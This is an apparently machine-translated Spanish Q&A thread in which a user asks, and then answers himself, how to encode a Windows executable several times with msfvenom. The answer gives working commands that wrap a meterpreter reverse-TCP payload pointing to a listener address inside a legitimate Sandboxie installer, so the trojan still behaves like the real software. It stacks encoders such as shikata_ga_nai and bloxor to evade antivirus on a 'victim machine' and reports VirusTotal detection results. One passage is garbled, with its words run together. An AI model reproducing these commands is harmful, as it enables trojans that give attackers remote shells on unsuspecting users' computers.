Codifique un archivo ejecutable varias veces con el veneno de MSF

5

Estoy intentando la codificación múltiple en el mismo archivo ejecutable, pero confuso con la sintaxis.

El problema:

Para codificar cualquier archivo ejecutable podemos usar la sintaxis:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X
LPORT=XXXX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe

Ahora, quiero codificar otro archivo ejecutable / mismo archivo; varias veces usando diferentes codificadores.
Sintaxis que estoy usando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XX -x  /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe

Encontré este subproceso y luego implementé la sintaxis anterior. Pero el archivo de salida que está generando no tiene el archivo ejecutable incluido. Como el tamaño de salida de la primera sintaxis es de 19 MB y de la segunda sintaxis es de 76 kB.

Por lo tanto, mi pregunta es cómo puedo implementar la codificación múltiple en el mismo archivo ejecutable.

    
pregunta neferpitou 18.03.2017 - 17:45
fuente

1 respuesta

2

Como sabemos, la codificación no ayuda mucho a evadir AV, pero obtuve un resultado interesante después de probar algunas cosas y si conocemos el nombre AV en la máquina víctima, podemos probar suerte con este método.

Método uno:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -x /root/Downloads/SandboxieInstall.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encodedsandbox.exe

Utilicé Sandboxie para este método y convirtió el archivo de 9MB en un archivo de 17.9MB. Luego lo subí en VirusTotal.

EnlacapturadepantallapuedeverAVcomoAvast,eScan,ESETpudieronescanearlocomountroyano.Sinembargo,solounospocosAVnolodetectaroncomosemuestraacontinuación.

Ahoravieneelsegundométodoquepreguntéenlapregunta,esdecir,"Codificar un archivo ejecutable varias veces con el veneno de MSF". Finalmente, pude implementarlo y encontré un resultado más emocionante.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -e x86/shikata_ga_nai -i 10 -f raw > eoncode.bin

msfvenom -p - -x /root/Downloads/SandboxieInstall.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 > sanbox.exe < eoncode.bin

La sintaxis es un poco diferente de lo que mencioné anteriormente en la pregunta, pero funcionó. El archivo final que generó fue de 17.9MB solo igual que el archivo anterior. El nuevo archivo generado actuará como el software original debido a la marca "-k" y el resultado de VirusTotal fue el mismo que el anterior, pero tuve éxito en lo que estaba intentando implementar.

Si eliminamos la marca "-k" de la última sintaxis, se generará el archivo exe de 9 MB y el icono será igual que el software original, es decir, Sandboxie, pero perderá su funcionalidad original (después de abrir el archivo, nada sucederá ya que el indicador "-k" eliminado, ya que tiene el mismo tamaño que el archivo original, el ícono ps también parece que la misma gente puede ejecutarlo). Pero cuando lo subí a VirusTotal encontré un resultado interesante como se muestra a continuación.

Que es justo lo contrario del resultado anterior.

    
respondido por el neferpitou 19.03.2017 - 21:30
fuente

Lea otras preguntas en las etiquetas